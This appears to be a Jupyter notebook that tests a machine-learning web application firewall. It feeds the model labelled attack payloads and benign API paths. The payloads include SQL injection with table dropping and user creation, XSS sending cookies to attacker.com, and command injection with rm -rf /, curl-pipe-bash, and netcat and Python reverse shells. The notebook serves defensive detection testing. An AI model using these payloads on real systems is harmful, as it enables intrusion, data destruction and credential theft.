In [23]:
import joblib
import base64

In [24]:
class WafDetector:
    def __init__(self):
        self.predictor = joblib.load('./request_predictor_improved.joblib')

    def try_decode_per_field(self, payload: str) -> str:
        fields = payload.split('&')
        decoded_fields = []
        
        for field in fields:
            try:
                if '=' in field:
                    key, value = field.split('=', 1)
                else:
                    key, value = field, ''
                
                current_value = value
                while True:
                    decoded_value = base64.b64decode(current_value).decode('utf-8')
                    current_value = decoded_value
                
            except (base64.binascii.Error, UnicodeDecodeError):
                decoded_fields.append(f"{key}={current_value}" if value else key)
        
        return '&'.join(decoded_fields)

    def parse_payload(self, payload):
        if isinstance(payload, str):
            return [payload]
        elif isinstance(payload, list):
            return payload
        else:
            raise ValueError("Payload must be a string or a list of strings.")

    def predict(self, payload):
        results_payload = []

        if isinstance(payload, str):
            payload = [payload]
        
        for entry in payload:
            decoded_entry = self.try_decode_per_field(entry)
            results_payload.append(decoded_entry)
        parsed_payload = self.parse_payload(results_payload)
        return self.predictor.predict(parsed_payload)

In [25]:
waf = WafDetector()

In [ ]:
payloads = [
    # SQL Injection
    # "username=admin' OR '1'='1&password=pass&submit=true",
    # "username=kiannaquines&password=password@1234&is_admin=true&submit=true' OR '1' = '1 --",
    # "username=admin' OR '1'='1' -- &password=pass&submit=true",
    # "username=admin' UNION SELECT null, username, password FROM users -- &password=pass&submit=true",
    # "username=admin' AND 1=CONVERT(int, (SELECT @@version)) -- &password=pass&submit=true",
    # "username=admin' AND (SELECT COUNT(*) FROM users) > 0 -- &password=pass&submit=true",
    # "username=admin'; DROP TABLE users; -- &password=pass&submit=true",  # Table Dropping
    # "username=admin'; EXEC xp_cmdshell('net user hacker Password123 /add'); -- &password=pass&submit=true",  # OS Command Execution via MSSQL
    # "username=admin'; WAITFOR DELAY '0:0:5'; -- &password=pass&submit=true",  # Time-Based Blind SQLi
    # "username=admin' AND SLEEP(5) -- &password=pass&submit=true",  # MySQL Time-Based Blind SQLi

    # Advanced XSS (Cross-Site Scripting)
    # "username=<script>alert(document.cookie)</script>&password=test&submit=true",  # Stealing Cookies
    # "username=<img src=x onerror=fetch('https://attacker.com/steal?cookie='+document.cookie)>&password=test&submit=true",  # Exfiltrating Data
    # "username=<iframe srcdoc='<img src=x onerror=alert(`XSS`)>'></iframe>&password=test&submit=true",  # Using srcdoc for XSS
    # "username=<svg><animate xlink:href=#xss attributeName=href values=javascript:alert('XSS') /><a id=xss><text x=20 y=20>XSS</text></a></svg>&password=test&submit=true",  # SVG Animation XSS
    # "username=test\" autofocus onfocus=alert('XSS')&password=test&submit=true",  # Autofocus Triggered XSS
    # "username=<div style=\"background-image:url(javascript:alert('XSS'))\"></div>&password=test&submit=true",  # CSS Injection XSS
    # "username=<object data=javascript:alert('XSS')></object>&password=test&submit=true",  # Object Tag XSS
    # "username=<embed src=javascript:alert('XSS')>&password=test&submit=true",  # Embed Tag XSS

    # Command Injection
    # "username=kiannaquines&password=password@1234567890&is_admin=true&submit=true; rm -rf /",
    # "username=root&password=password&submit=true; ls -la",
    # "username=admin&password=pass&submit=true; cat /etc/passwd",
    "username=test&password=1234 | whoami&submit=true",
    # "username=guest&password=abcd; echo hacked > /tmp/hack.txt&submit=true",
    # "username=admin&password=pass&submit=true; ping -c 10 attacker.com",  # Network Abuse
    # "username=admin&password=pass&submit=true; curl http://malicious-site.com/payload.sh | bash",  # Remote Code Execution
    # "username=admin&password=pass&submit=true; nc -e /bin/sh attacker.com 4444",  # Reverse Shell
    # "username=admin&password=pass&submit=true; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"attacker.com\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'",  # Python Reverse Shell

    # Path Traversal
    "username=admin&password=admin&submit=true&file=../../../../etc/passwd",
    "username=user&password=pass&file=../../../../../../../windows/system32/cmd.exe",
    "img_path=../../../../../../etc/passwd",
    "file=..%2F..%2F..%2F..%2Fetc%2Fpasswd",  # URL Encoded Path Traversal
    "file=%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd",  # Double Dot Encoding
    "file=/var/www/html/../../../../../etc/passwd",  # Absolute Path Traversal

    "/api/products",              # Get all products
    "/api/products/456",          # Get product by ID
    "/api/products/categories",   # Get all product categories
    "/api/products?category=electronics&sort=price_desc",  # Filtered product listing
    "/api/cart",                  # Get user's shopping cart
    "/api/cart/add",              # Add item to cart
    "/api/cart/remove",           # Remove item from cart
    "/api/orders",                # Get user orders
    "/api/orders/789",            # Get order details
    "/api/orders/789/status",     # Get order status

    # Blog & Content
    "/api/blog",                 # Get all blog posts
    "/api/blog/555",             # Get specific blog post
    "/api/blog/categories",      # Get blog categories
    "/api/blog/author/123",      # Get posts by author

    # Admin Endpoints (Restricted)
    "/api/admin/dashboard",       # Admin dashboard data
    "/api/admin/users",           # Manage users
    "/api/admin/orders",          # Manage orders
    "/api/admin/products",        # Manage products

    # Search & Filtering
    "/api/search?q=laptop",      # Global search
    "/api/search/users?q=johndoe",  # Search users
    "/api/search/products?q=smartphone",  # Search products

    # Miscellaneous
    "/api/notifications",        # Get user notifications
    "/api/settings",             # Get global app settings
    "/api/version",              # Get API version
    "/api/status",               # Health check API
    # NoSQL Injection
    # XML External Entity (XXE)
    # Insecure Deserialization
    # Base64 Encoded (Valid and Malicious)
    # HTTP Header Injection
    # Open Redirect
]

result = waf.predict(payloads)

In [ ]:
print("Prediction:", result)